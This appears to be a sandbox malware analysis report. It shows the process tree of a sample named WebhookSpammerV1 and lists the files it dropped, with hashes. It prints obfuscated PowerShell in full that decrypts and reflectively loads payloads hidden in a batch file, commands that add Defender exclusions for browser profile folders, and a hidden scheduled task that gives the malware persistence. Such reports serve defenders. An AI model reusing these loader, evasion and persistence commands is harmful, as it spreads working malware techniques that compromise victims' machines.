                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2140 /prefetch:2
                                                        11⤵
                                                          PID:2764
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2116 /prefetch:2
                                                          11⤵
                                                            PID:1604
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2384 /prefetch:2
                                                            11⤵
                                                              PID:2280
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2128 /prefetch:2
                                                              11⤵
                                                                PID:2724
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4460 /prefetch:2
                                                                11⤵
                                                                  PID:2300
                                                        • C:\Windows\coolhi.exe
                                                          "C:\Windows\coolhi.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:5064
                                                          • C:\Windows\coolhi.exe
                                                            "C:\Windows\coolhi.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:1656
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default'"
                                                              9⤵
                                                                PID:1536
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default'
                                                                  10⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:5076
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles'"
                                                                9⤵
                                                                  PID:4516
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles'
                                                                    10⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:3768
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "ver"
                                                                  9⤵
                                                                    PID:1896
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV1.bat" "
                                                              6⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:2092
                                                              • C:\Windows\system32\net.exe
                                                                net file
                                                                7⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3708
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 file
                                                                  8⤵
                                                                    PID:3464
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnQ+LJ8uABbHbXAO4FuFVPGKynZ/3LF7hH8th9C5LeY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Giel7QVtc7MgczVdodu2Dw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $LluQH=New-Object System.IO.MemoryStream(,$param_var); $RYzDP=New-Object System.IO.MemoryStream; $FvOhk=New-Object System.IO.Compression.GZipStream($LluQH, [IO.Compression.CompressionMode]::Decompress); $FvOhk.CopyTo($RYzDP); $FvOhk.Dispose(); $LluQH.Dispose(); $RYzDP.Dispose(); $RYzDP.ToArray();}function execute_function($param_var,$param2_var){ $oYKjg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ccxBj=$oYKjg.EntryPoint; $ccxBj.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV1.bat';$wXwUA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV1.bat').Split([Environment]::NewLine);foreach ($wtvna in $wXwUA) { if ($wtvna.StartsWith(':: ')) { $cIlpE=$wtvna.Substring(3); break; }}$payloads_var=[string[]]$cIlpE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                  7⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Modifies registry class
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:4864
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_670_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_670.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                    8⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:2692
                                                                  • C:\Windows\System32\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_670.vbs"
                                                                    8⤵
                                                                    • Checks computer location settings
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1888
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_670.bat" "
                                                                      9⤵
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:4604
                                                                      • C:\Windows\system32\net.exe
                                                                        net file
                                                                        10⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:668
                                                                        • C:\Windows\system32\net1.exe
                                                                          C:\Windows\system32\net1 file
                                                                          11⤵
                                                                            PID:2280
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnQ+LJ8uABbHbXAO4FuFVPGKynZ/3LF7hH8th9C5LeY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Giel7QVtc7MgczVdodu2Dw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $LluQH=New-Object System.IO.MemoryStream(,$param_var); $RYzDP=New-Object System.IO.MemoryStream; $FvOhk=New-Object System.IO.Compression.GZipStream($LluQH, [IO.Compression.CompressionMode]::Decompress); $FvOhk.CopyTo($RYzDP); $FvOhk.Dispose(); $LluQH.Dispose(); $RYzDP.Dispose(); $RYzDP.ToArray();}function execute_function($param_var,$param2_var){ $oYKjg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ccxBj=$oYKjg.EntryPoint; $ccxBj.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_670.bat';$wXwUA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_670.bat').Split([Environment]::NewLine);foreach ($wtvna in $wXwUA) { if ($wtvna.StartsWith(':: ')) { $cIlpE=$wtvna.Substring(3); break; }}$payloads_var=[string[]]$cIlpE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                          10⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:4456
                                                                          • C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV1.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV1.exe"
                                                                            11⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            • Drops file in Windows directory
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:4040
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAbgB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAeAB0ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAcwBvAHIAcgB5ACAAZABvAHcAbgAgAGYAbwByACAAbgBvAHcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGQAaQBlACMAPgA="
                                                                              12⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:4912
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                13⤵
                                                                                  PID:4372
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAagBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAcQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAbgBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAawB6ACMAPgA="
                                                                                12⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:664
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  13⤵
                                                                                    PID:4464
                                                                                • C:\Windows\Latite_Client_betterV1.exe
                                                                                  "C:\Windows\Latite_Client_betterV1.exe"
                                                                                  12⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4348
                                                          • C:\ProgramData\Latite_Client_betterV1.exe
                                                            C:\ProgramData\Latite_Client_betterV1.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:3632
                                                          • C:\ProgramData\WebhookSpammerV5.exe
                                                            C:\ProgramData\WebhookSpammerV5.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:4368
                                                          • C:\ProgramData\Latite_Client_betterV1.exe
                                                            C:\ProgramData\Latite_Client_betterV1.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:3108
                                                          • C:\ProgramData\WebhookSpammerV5.exe
                                                            C:\ProgramData\WebhookSpammerV5.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:2188
                                                          • C:\ProgramData\Latite Client_BetterV3.exe
                                                            "C:\ProgramData\Latite Client_BetterV3.exe"
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:2280
                                                          • C:\ProgramData\WindowsDefender
                                                            C:\ProgramData\WindowsDefender
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:1444
                                                          • C:\Windows\explorer.exe
                                                            C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                            1⤵
                                                            • Modifies Internet Explorer settings
                                                            • Modifies registry class
                                                            • Suspicious behavior: AddClipboardFormatListener
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3068
                                                          • C:\Windows\System32\rundll32.exe
                                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
                                                            1⤵
                                                              PID:4900

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                              Filesize

                                                              3KB

                                                              MD5

                                                              661739d384d9dfd807a089721202900b

                                                              SHA1

                                                              5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                                              SHA256

                                                              70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                                              SHA512

                                                              81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\7a4cbb3f-9de5-43f8-8d07-ea9c37410df9.dmp

                                                              Filesize

                                                              974KB

                                                              MD5

                                                              6b406de1dada7b2f13fcd9087e344b7c

                                                              SHA1

                                                              aa27d5d524256dfd24662730e0aa43227c826c69

                                                              SHA256

                                                              96a00f8eb613a780b438aebbdecd4a69e737abd50a4002fc060ebdda7ee937c8

                                                              SHA512

                                                              2957cfc3fac5de6b11e99c426e027e4b4db7e7881c68aba4e1c23224ce65123630c28a7edaaa2d32d2cde712a365c343d79b431d16d9370adfeacfb096cb0ed8

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\7aabdb95-1b8d-4da4-8445-aeb9e6a8984c.dmp

                                                              Filesize

                                                              978KB

                                                              MD5

                                                              9e8fb6887306a49e0e453d57436cfbbb

                                                              SHA1

                                                              b521b98c180dd437769700438e52212c80e222e9

                                                              SHA256

                                                              aca2aadef4152651c3e2900f37dd32664dc3a07c69005c1b369277ca20873707

                                                              SHA512

                                                              a986500eaf2d8c674cf665ee1ee54a6971c541e5ded75aa48009c9c20f05154b2fdf3038cbc345fadffbba861c3c02fa9196a4c9a9409f42524bd0576bc319c8

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\7fa19ca8-1dd4-40da-8545-4d49b04334c7.dmp

                                                              Filesize

                                                              978KB

                                                              MD5

                                                              b75da7d1d79f6bab34c1486e70c57db2

                                                              SHA1

                                                              f30150ee82938853f876c48d19b7ff66dbc76aba

                                                              SHA256

                                                              3102f0f1a046e634212d54a7abfa4a20af22e53e02471343c548e2b2bb50a4f8

                                                              SHA512

                                                              40b2265aa57ce034d49b56bd59e297067cacf8894aeee1609661c491d560baae5cdb091459d3de1326814be44e1886fac8adbd2c189fbf2bd9bde6305d28f8f1

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\b1b8771a-ec99-4116-bfa1-1e4cdbfe699a.dmp

                                                              Filesize

                                                              978KB

                                                              MD5

                                                              0f279faaa3743fcc8885b8f1babf3988

                                                              SHA1

                                                              84e4c017c94e3e2504b10628d9674db680bba755

                                                              SHA256

                                                              bccdec58ff11848fb93dba125bd0272672d6dab8cc57bdbcb78973351b6656c7

                                                              SHA512

                                                              4e742510960f58793c696f3a9ca49703669d9a5e4639943fef884fd57dd08545f1135b6049385911fbe35ab5c1f8827c6096667c8325e12dde392a198621bf49

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\c2845757-8977-4158-8e0d-11fdb432ad0a.dmp

                                                              Filesize

                                                              978KB

                                                              MD5

                                                              87182f5d485c8fe22da717d90020d637

                                                              SHA1

                                                              66b11ee6c21c0e2bd56b5c9a72296fc3a8fd8ad4

                                                              SHA256

                                                              c3716404592b425fe51bf6bcc9593dc94e40e8baf8463050e14d2686b9666da2

                                                              SHA512

                                                              852baefb988010a24bdb1c792413faff8bf52fd3e2530b7c89b4975ef921fdf333466ee3704f12564e6c84bc033a4208de3f84ac514f4ce794eba05076cff2f9

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\d4983ce4-4de0-4412-9871-4c95683f0956.dmp

                                                              Filesize

                                                              978KB

                                                              MD5

                                                              ac510beb22a79abe70ebcbcf3c4d5c68

                                                              SHA1

                                                              81bc11b4a139d228ba7679f4973ea0abc25bfb97

                                                              SHA256

                                                              8f3d65a3bdaf13fbf01471d465a1bcaf3a76a2fefbbe6e1847ff83766116330f

                                                              SHA512

                                                              0b55add2c311bf148bb5d92ff50b29e62f6a0e433fa85de88e1d60cac9e50fbce21bafdd5895ebdeb20953e0576ce6761f67a790e1a82af8844ef626a61f9f57

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\f0719141-f9c0-4436-b336-37b2a69524d7.dmp

                                                              Filesize

                                                              6.2MB

                                                              MD5

                                                              a9910b10ace53090bb75ea686fbcc703

                                                              SHA1

                                                              948bf7954d03afe9bb84dc358c9784c6c8d65ff8

                                                              SHA256

                                                              2c22ab8f9fda4bae74efb5332ec8925b07c5df8da125f22741354b0b96cc7873

                                                              SHA512

                                                              88eb6d91cfa98069c932cf6b69a00d6e7ac57fcfa70e4769a64b7ea4fc7c302b080aaaa6941d3ccd293eb814eafea092b7986203834f911898680e07ee676958

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

                                                              Filesize

                                                              152B

                                                              MD5

                                                              38f59a47b777f2fc52088e96ffb2baaf

                                                              SHA1

                                                              267224482588b41a96d813f6d9e9d924867062db

                                                              SHA256

                                                              13569c5681c71dc42ab57d34879f5a567d7b94afe0e8f6d7c6f6c1314fb0087b

                                                              SHA512

                                                              4657d13e1bb7cdd7e83f5f2562f5598cca12edf839626ae96da43e943b5550fab46a14b9018f1bec90de88cc714f637605531ccda99deb9e537908ddb826113b

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

                                                              Filesize

                                                              152B

                                                              MD5

                                                              ab8ce148cb7d44f709fb1c460d03e1b0

                                                              SHA1

                                                              44d15744015155f3e74580c93317e12d2cc0f859

                                                              SHA256

                                                              014006a90e43ea9a1903b08b843a5aab8ad3823d22e26e5b113fad5f9fa620ff

                                                              SHA512

                                                              f685423b1eaee18a2a06030b4b2977335f62499c0041c142a92f6e6f846c2b9ce54324b6ae94efbbb303282dcda70e2b1597c748fddc251c0b3122a412c2d7c4

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

                                                              Filesize

                                                              152B

                                                              MD5

                                                              6d12b67368b13a443c7464b4babcb009

                                                              SHA1

                                                              e9dc883aba7b02dd2c86359f032b4b9b7b8cb7bc

                                                              SHA256

                                                              b8ee16f58c4ec3236c717769995b88ce0bcb87f6941713506cbaf698a77d0000

                                                              SHA512

                                                              77b664930023264d99de1c0c495692a22828a2c2eef6c1878a1e65d6db3032fe58c055099e75296aed0129b5064fb21f1997ca40cbd838aee52bd0cefaacf41c

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

                                                              Filesize

                                                              152B

                                                              MD5

                                                              1eb48c5df63bd2f0add7cbede333cd6f

                                                              SHA1

                                                              fdce1cf1c289358596c094c61c263c8949c13ccb

                                                              SHA256

                                                              8d14078b93af75e93eacf0078ec54df410a985cf68a21106e2a8fc3d7b5a45c8

                                                              SHA512

                                                              3011b4eedcef9af5b34eff4a3a34802511f878c6c746bb606732924fb82d2459bcbf2fd8708e4b1dbc525cbe1e6a0f6a0dbf8388700dd0b2d353919f0ed9dda8

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

                                                              Filesize

                                                              152B

                                                              MD5

                                                              a1a9a560fa85a10b9a3901cafe69bcc9

                                                              SHA1

                                                              72ee607d42c75e0b6dbe5a996d19f4d64cbaa13a

                                                              SHA256

                                                              384406b499873fe86a1da4a71ae39013efde870f1b6dd58d6614382b80bd47d2

                                                              SHA512

                                                              faafa0602cc00e1f1ec0748e7f03fb956c75584ee8c5935ea50c1d6b446b9739b39529c7e25648b8383bcdfc9b67e8cb4c23a8f0e3f0e49372c9c8ff08aa218c

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\5e7d0068-ff60-4415-afef-fc1442737749.tmp

                                                              Filesize

                                                              5KB

                                                              MD5

                                                              1a33327122cc2326c9604d3b7d2a0bac

                                                              SHA1

                                                              24058799f5b18fddb7ae42f2ba0e120b581c6192

                                                              SHA256

                                                              bb834931f7eaac723f1f612cde4b6fa0395ba21e843e3930da722eeda26d3941

                                                              SHA512

                                                              3d90222198a94e92735a8bda533166661405a32287d4f5d79a4f268fa79a1457788a53af6072bc2f2c7922d393dc8b148d40279effbc8a755e12c7b318a0daf8

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_1

                                                              Filesize

                                                              264KB

                                                              MD5

                                                              f50f89a0a91564d0b8a211f8921aa7de

                                                              SHA1

                                                              112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                              SHA256

                                                              b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                              SHA512

                                                              bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                              Filesize

                                                              16B

                                                              MD5

                                                              6752a1d65b201c13b62ea44016eb221f

                                                              SHA1

                                                              58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                              SHA256

                                                              0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                              SHA512

                                                              9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\CURRENT

                                                              Filesize

                                                              16B

                                                              MD5

                                                              46295cac801e5d4857d09837238a6394

                                                              SHA1

                                                              44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                              SHA256

                                                              0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                              SHA512

                                                              8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\MANIFEST-000001

                                                              Filesize

                                                              41B

                                                              MD5

                                                              5af87dfd673ba2115e2fcf5cfdb727ab

                                                              SHA1

                                                              d5b5bbf396dc291274584ef71f444f420b6056f1

                                                              SHA256

                                                              f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                              SHA512

                                                              de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Local State

                                                              Filesize

                                                              10KB

                                                              MD5

                                                              952339009dd9dc4a7635058fbf30fd25

                                                              SHA1

                                                              03de23b6da532e3e3d4ea5b341876d62be768129

                                                              SHA256

                                                              eb52b6c7c48e56042fd834590c2187bac74984c594b3b29043ada9bbeda37b2d

                                                              SHA512

                                                              19477c8feba802b1e6b3995873db123919eb1d96100317d1a00fb34f5668fef95b55bc0e671f55087f83d33c50e7f5d6a09390addcce6de1cd885b312998a437

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              773440cd6eb4e778c7d2115d1f231f75

                                                              SHA1

                                                              4b600aa41fcd267817961c95b104a0717c40e558

                                                              SHA256

                                                              64c178f2a2edc319c244fa885951e0425ad172e0c9c18d9773069fa13a44385c

